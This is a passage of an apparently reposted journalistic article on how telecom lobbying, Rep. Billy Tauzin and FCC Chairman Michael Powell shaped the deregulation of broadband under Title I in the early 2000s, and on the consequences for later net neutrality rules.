non-discrimination requirements in exchange for owning and operating monopolies. At the time of its creation this applied primarily to telephone companies, but the requirements of the law are also well suited to preventing internet service providers from violating net neutrality principles. To consumers, cable and DSL ISPs were offering nearly identical services, but because of the outdated laws they were being treated very differently by regulators. In order to achieve regulatory parity, regulators had to decide if broadband service was more like a cable television channel or more like landline telephone service. In other words, they had to choose between regulating cable Internet up to Title II or deregulating DSL Internet service down to its general Title I authority. The Baby Bells In 2000 the DSL industry was dominated by the four remaining companies from the breakup of the old AT&T monopoly—Verizon, BellSouth, SBC Communications, and Qwest. These companies, commonly referred to as the “Baby Bells,” still operated regional monopolies and therefore were required under the 1996 bill to allow other carriers to access their networks. Because of this requirement, a new and growing industry of startup ISPs (competitive local exchange carriers, or CLECs) had begun leasing copper-line infrastructure from the Bells and offering competing broadband service to customers on their lines. Not surprisingly, as the Baby Bells rolled out their DSL service, they saw the cable industry’s more relaxed regulations and total lack of competition and wanted the same treatment from the government. They launched a massive lobbying effort to push the Clinton and Bush administrations, the Federal Communication Commission, and Congress to eliminate the network sharing requirement that had spawned the CLEC market and to deregulate DSL services more broadly. Between 1999 and 2002 the four companies spent a combined $95.6 million on lobbying the federal government, according to data from the Center for Responsive Politics, which would rank them above such trade group lobbying behemoths as the Chamber of Commerce and the American Medical Association in total lobbying expenditures for the years. The companies also spent millions to lobby the public directly through aggressive advertising and public relations campaigns. Their basic strategy was to push a bargain that if DSL was reclassified and they were allowed to operate regional monopolies without having to follow common carrier rules, they would voluntarily increase their investments in infrastructure and speed up the deployment of broadband in underserved areas. One of the Baby Bells’ closest allies in Congress at the time was Louisiana Democrat-turned-Republican Rep. Billy Tauzin, who in 2001 had become the Chairman of the Energy and Commerce Committee, which oversees telecommunications issues and the Federal Communications Commission. The four companies had given hundreds of thousands to Tauzin’s electoral campaigns over the years. In the 2000 election, Verizon was Tauzin’s largest single donor ($13,750) and SBC was his fourth largest ($10,000). In the 2002 election the Baby Bells gave more than $61,300 to Tauzin’s campaign committee and leadership PAC, making him the top congressional recipient of their political spending for that cycle. They also helped pay for a $400,000 Mardi Gras-themed fundraiser for Tauzin at the 2000 Republican National Convention. Tauzin’s son was employed at the time as a lobbyist for one of the Baby Bells, BellSouth, in Louisiana. (For more information on Tauzin’s deep relationship with the Bell companies, check out this article originally published at Interactive Weekly). In 2001 Tauzin teamed up with Democratic Rep. John Dingell, himself a top recipient of Baby Bell largesse, to sponsor legislation that would give the companies pretty much everything they had been lobbying for. Their bill, the “Internet Deployment and Broadband Freedom Act,” known more commonly as “Tauzin-Dingell,” would exempt Verizon and the Baby Bells from having to share their networks with competitive start-up carriers as required by the 1996 bill. The bill also proposed to add a new section to Title II of the Communications Act to broadly exempt broadband Internet, regardless of the carrier technology, from a wide swath of the regulatory powers held by the FCC and the states. “Neither the [Federal Communications] Commission, nor any State, shall have authority to regulate the rates, charges, terms, or conditions for, or entry into the provision of, any high speed data service, Internet backbone service, or Internet access service,” the bill text read in part. On February 27, 2002, Tauzin’s bill was brought to the floor of the House and passed by a vote of 273-157. Both Democrats and Republicans were divided on the bill, but it still won support from a majority of both parties. More than party affiliation, campaign contributions from Verizon and the Baby Bells were a better predictor of how members would vote, a fact that suggests the companies had a powerful influence over policymakers as they debated the future of broadband regulation. According to an analysis by the Center for Responsive Politics, the representatives who voted in favor of Tauzin-Dingell received, on average, 2.9 times more money from Verizon and the Baby Bells in the form of campaign contributions in the 2002 election than did the Representatives who voted against it. The cable industry was officially indifferent to Tauzin-Dingell, despite the fact that it benefited its chief competitor industry, because they recognized that it favored a “regulate down” approach and, if enacted, could put them in a better position for avoiding new regulations on their own services. “NCTA strongly believes that marketplace competition is the best way to foster the availability of broadband services to all Americans,” the National Cable & Telecommunications Association (NCTA) said in a statement. “Thus, we have not opposed the Tauzin-Dingell bill nor advocated that regulatory conditions be placed on broadband competitors." Tauzin’s friend Powell At the same time that the House was voting on the Tauzin-Dingell bill, the Federal Communications Commission was considering separately what they could do through rulemaking to achieve regulatory parity between cable and DSL. In 2000 the FCC launched a rulemaking proceeding to determine how to classify and regulate cable internet service. In 2002 they opened a similar proceeding for DSL that sought to “resolve outstanding issues regarding the classification of telephone-based broadband Internet access services and the regulatory implications of that classification.” Beginning in 2001, the Federal Communications Commission was chaired by Michael Powell, the son of Colin Powell and a former attorney for GTE Corp., the company that would form Verizon after merging with Bell Atlantic in 2000. Powell, in many ways, owes his position on the FCC to none other than Rep. Billy Tauzin. Back in 1997, Tauzin lobbied to get Powell appointed to the commission over incumbent Rachelle Chong, who was seeking a second term. Then, in 2001, Tauzin led the charge to get President Bush to elevate Powell to the chairmanship over Pat Wood III, who, until Tauzin got involved, was widely expected to take the position. As recounted by Village Voice reporter Brendan Koerner, Tauzin “engineered” Powell’s accession to the chairmanship as one of his first Bush-era acts. To recap: Powell, a former attorney for Verizon, was hand-picked to lead the FCC by the head of the congressional committee with oversight over the commission, Billy Tauzin, and immediately faced major decisions on the regulatory classification of the Internet, an issue that Tauzin had spent years working on and that directly impacted the bottom line of his biggest donors. Powell seems to have received the message that Billy Tauzin and the House of Representatives sent when they voted to gut Title II as it applies to the Internet. On Feb. 14, 2002, just two weeks after the House passed the Tauzin-Dingell bill, the Powell-led FCC took an unusual step that set in motion their approach to regulatory parity for cable and DSL. The Commission leapfrogged the typical public comment period and “notice of proposed rulemaking” and issued a declaratory ruling that cable Internet was properly classified as an information service, and thus not subject to common carrier rules, including line sharing requirements and nondiscrimination protections. One month later they released a rule proposal that tentatively concluded that DSL would also be reclassified as a Title I information service. The DSL reclassification was finalized in 2005. It’s unclear what kinds of discussions Billy Tauzin was having with Powell around the FCC’s decisions to classify broadband as a Title I information service, but watchdog groups were accusing him of “meddling” in related rulemaking proceedings at the agency around the same time. Later accounts of Tauzin’s involvement in health care legislation as a lobbyist for the pharmaceutical industry suggest that he can be aggressive at lobbying policymakers to bend his way. With the FCC’s rulings, broadband Internet service was officially differentiated from dial-up Internet service for regulatory purposes and reclassified to the same category of lightly regulated information services as things like websites or apps. The Powell-led FCC had finalized nearly all of the broadband deregulation that the Baby Bells had lobbied for and that Rep. Tauzin and Baby Bell-backed representatives had endorsed, but without having to go through Congress and change the law. These rulings led to the elimination of line-sharing requirements and decimated the CLEC industry that had been competing with the local monopolies for residential broadband customers. Years later Verizon and Comcast would use the rulings to kill the FCC’s attempts at enforcing net neutrality. In 2010, the DC Circuit Court of Appeals ruled in favor of Comcast in determining that the FCC did not have “reasonably ancillary” jurisdiction to use Title I of the Communication Act to stop Comcast from throttling peer-to-peer programs because they could not cite a statutorily mandated responsibility empowering them to do so. In 2014 the DC Circuit cited the Title I classification of ISPs in siding with Verizon and vacating the FCC’s second attempt at promulgating net neutrality rules. “Given that the Commission has chosen to classify broadband providers in a manner that exempts them from treatment as common carriers, the Communications Act expressly prohibits the Commission from nonetheless regulating them as such,” the court stated. Michael Powell left the FCC in 2005, but he is still one of the most powerful figures in determining Internet regulations and net neutrality rules. Powell is now the president and chief lobbyist of the NCTA, a cable industry trade group that has been the hands-down leader in the industry’s efforts to block net neutrality. Under Powell, the organization has increased its spending on lobbying year after year and it now spends more on lobbying than any other organization in the communications sector. With Powell at the helm working his connections in Congress and at the FCC, they seemed to be getting maximum bang for the buck because so-called revolving door connections make lobbying spending more effective—until current FCC Chairman and former NCTA chief Tom Wheeler announced that he would propose to reclassify broadband as Obama suggested. Although it looks like as though the FCC is about to reclassify broadband as Title II, many of the same factors that led to the deregulatory rulings of the early 2000s are still in play. Members of Congress, disproportionately those who are financially supported by large cable and telecom companies, are lobbying against Title II reclassification. The broadband industry is now more consolidated than ever and the industry’s promise of infrastructure investment in exchange for deregulation has not come to pass. The companies that provide Internet service to most Americans have not always been deregulated monopolies with the ability to create fast lanes and slow lanes on the Internet. They got there by using many of the tactics that have fueled the record levels of distrust in the U.S. government—bought politicians, corrupt legislation, and revolving-door power trading. While it’s not possible to examine the counterfactual history in which policymakers designed regulatory parity for the Internet with total independence, it should be acknowledged that the current net neutrality debate is based on past policy decisions, including the original removal of broadband from Title II, that were shaped by lobbying dollars and the raw monopoly power of America’s top telecommunications companies. Donny Shaw is a freelance journalist covering money in politics, tech, monopoly power and the legislative process. Source
×
×
  • Create New...